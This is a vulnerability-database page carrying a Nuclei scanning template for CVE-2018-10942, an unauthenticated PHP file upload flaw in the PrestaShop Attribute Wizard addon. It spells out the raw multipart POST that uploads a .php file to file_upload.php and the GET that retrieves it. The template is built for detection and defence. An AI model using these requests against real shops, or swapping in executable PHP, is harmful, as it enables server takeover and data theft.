Lucene search
K

Prestashop AttributeWizardPro Module - Arbitrary File Upload

🗓️ 28 Jun 2026 15:08:32Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 149 Views

Prestashop AttributeWizardPro Module - Remote Code Executio

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2018-10942
25 Dec 202400:00
circl
CNVD
PrestaShop Attribute Wizard addon code execution vulnerability
15 May 201800:00
cnvd
CVE
CVE-2018-10942
10 May 201803:00
cve
Cvelist
CVE-2018-10942
10 May 201803:00
cvelist
NVD
CVE-2018-10942
10 May 201803:29
nvd
OSV
CVE-2018-10942
10 May 201803:29
osv
Prion
Design/Logic Flaw
10 May 201803:29
prion
VulnCheck KEV
VulnCheck KEV: CVE-2018-10942
28 Jun 202400:00
vulncheck_kev
id: CVE-2018-10942

info:
  name: Prestashop AttributeWizardPro Module - Arbitrary File Upload
  author: MaStErChO
  severity: critical
  description: |
    In the Attribute Wizard addon 1.6.9 for PrestaShop allows remote attackers to execute arbitrary code by uploading a php file.
  impact: |
    Unauthenticated attackers can upload and execute arbitrary PHP files, leading to complete server compromise, data theft, and potential lateral movement within the network.
  remediation: |
    Remove or update the Attribute Wizard addon to a patched version.
  reference:
    - https://webcache.googleusercontent.com/search?q=cache:y0TbS2LsRfoJ:www.vfocus.net/art/20160629/12773.html&hl=en&gl=en
    - https://www.openservis.cz/prestashop-blog/nejcastejsi-utoky-v-roce-2023-seznam-deravych-modulu-nemate-nejaky-z-nich-na-e-shopu-i-vy/
    - https://nvd.nist.gov/vuln/detail/CVE-2018-10942
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2018-10942
    cwe-id: CWE-434
    epss-score: 0.12744
    epss-percentile: 0.95775
    cpe: cpe:2.3:a:attribute_wizard_project:attribute_wizard:1.6.9:*:*:*:*:prestashop:*:*
  metadata:
    max-request: 8
    vendor: attribute_wizard_project
    product: attribute_wizard
    framework: prestashop
  tags: prestashop,attributewizardpro,intrusive,file-upload,cve2018,cve,attribute_wizard_project,vkev,vuln
variables:
  filename: '{{rand_base(7, "abc")}}'

http:
  - raw:
      - |
        POST /modules/{{paths}}/file_upload.php  HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=ba1f796d0aa2482e9c51c81ae6087818

        --ba1f796d0aa2482e9c51c81ae6087818
        Content-Disposition: form-data; name="userfile"; filename="{{filename}}.php"
        Content-Type: multipart/form-data

        {{randstr}}
        --ba1f796d0aa2482e9c51c81ae6087818--

      - |
        GET /modules/{{paths}}/file_uploads/{{file}}  HTTP/1.1
        Host: {{Hostname}}

    payloads:
      paths:
        - 'attributewizardpro'
        - '1attributewizardpro'
        - 'attributewizardpro.OLD'
        - 'attributewizardpro_x'

    stop-at-first-match: true
    host-redirects: true
    max-redirects: 3
    matchers-condition: and
    matchers:
      - type: word
        part: body_1
        words:
          - '{{filename}}'

      - type: word
        part: body_2
        words:
          - '{{randstr}}'

    extractors:
      - type: regex
        name: file
        part: body_1
        internal: true
        group: 1
        regex:
          - '(.*?)\|\|\|\|'
# digest: 490a0046304402207d3edd8714a7a5fba44256253f9ef02615e7175288d0ee59ff15f0768b9d63df02203cbf661c3017cd322f3b2a203fe1f36a4299dca2504cc96fe56622659af3b070:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.7High risk
Vulners AI Score7.7
CVSS 27.5
CVSS 39.8
EPSS0.12744
149